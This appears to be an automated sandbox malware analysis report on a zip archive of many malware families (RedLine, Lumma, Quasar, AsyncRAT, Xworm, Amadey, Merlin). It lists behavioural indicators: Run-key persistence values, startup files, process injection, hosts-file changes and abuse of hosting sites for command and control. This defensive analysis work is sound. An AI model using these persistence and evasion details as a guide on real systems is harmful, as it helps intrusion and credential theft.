Malware Analysis Report

2025-01-23 11:57

Sample ID 241214-yzc98svkfr
Target 241127-xqsswsslej_pw_infected.zip
SHA256 cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Tags
amadey asyncrat lumma merlin quasar redline xworm backdoor collection credential_access defense_evasion discovery execution infostealer persistence privilege_escalation pyinstaller ransomware rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

Threat Level: Known bad

The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

Redline family

Quasar RAT

RedLine payload

Lumma family

Quasar payload

Xworm family

Amadey

RedLine

Asyncrat family

Merlin

Quasar family

Lumma Stealer, LummaC

AsyncRat

Amadey family

Merlin payload

Detect Xworm Payload

Merlin family

Async RAT payload

Downloads MZ/PE file

Blocklisted process makes network request

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Loads dropped DLL

Clipboard Data

Unsecured Credentials: Credentials In Files

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Enumerates connected drives

Looks up external IP address via web service

Checks installed software on the system

Drops file in System32 directory

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

UPX packed file

Drops file in Windows directory

Drops file in Program Files directory

Detects Pyinstaller

Embeds OpenSSL

Event Triggered Execution: Netsh Helper DLL

Command and Scripting Interpreter: JavaScript

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

Browser Information Discovery

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

System policy modification

Modifies registry key

Gathers system information

Detects videocard installed

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies Control Panel

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Modifies registry class

Suspicious use of WriteProcessMemory

Kills process with taskkill

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Views/modifies file attributes

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-14 20:13

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-14 20:13

Reported

2024-12-14 20:22

Platform

win11-20241007-es

Max time kernel

264s

Max time network

554s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Merlin

backdoor merlin

Merlin family

merlin

Merlin payload

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

RedLine

infostealer redline

RedLine payload

Redline family

redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4020 created 3260 N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com C:\Windows\Explorer.EXE

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
N/A N/A C:\Windows\sysnldcvmr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3076928777.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe N/A
N/A N/A C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\shost.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\BingWallpaperApp = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\new = "C:\\Users\\Admin\\AppData\\Roaming\\new.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" C:\Windows\system32\audiodg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A bitbucket.org N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A ipapi.co N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\20241214.jpg" C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2148 set thread context of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2864 set thread context of 4396 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4760 set thread context of 4488 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 5272 set thread context of 1348 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 5132 set thread context of 5168 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe C:\Windows\system32\svchost.exe
PID 5132 set thread context of 5228 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe C:\Windows\system32\audiodg.exe
PID 5132 set thread context of 4356 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe C:\Windows\system32\msiexec.exe
PID 6408 set thread context of 6292 N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
PID 6736 set thread context of 4176 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 6544 set thread context of 4344 N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\seetrol\client\sas.dll C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolMyService.exe C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
File created C:\Program Files (x86)\seetrol\client\sthooks.dll C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolClient.exe C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\sysnldcvmr.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
File created C:\Windows\SystemTemp\~DF793DC10DA9572D25.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp-\CustomAction.config C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\Installer\SourceHash{240D9941-B463-4B9C-B483-7129740B9AC1} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp-\DispatchQueue.dll C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\SystemTemp\~DFDFB63DB7F55637BF.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\InternshipWant C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File opened for modification C:\Windows\GovernmentalPoetry C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File opened for modification C:\Windows\Installer\e5af28f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp-\CustomActions.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\MoBelongs C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File opened for modification C:\Windows\Installer\MSIF406.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp-\CustomAction.config C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\JpegSuse C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFE6D59846241A2593.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\Installer\e5af28f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF4EF8ECC2C6C84C85.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5af293.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp-\CustomActions.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp-\DispatchQueue.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\JpgCelebrity C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

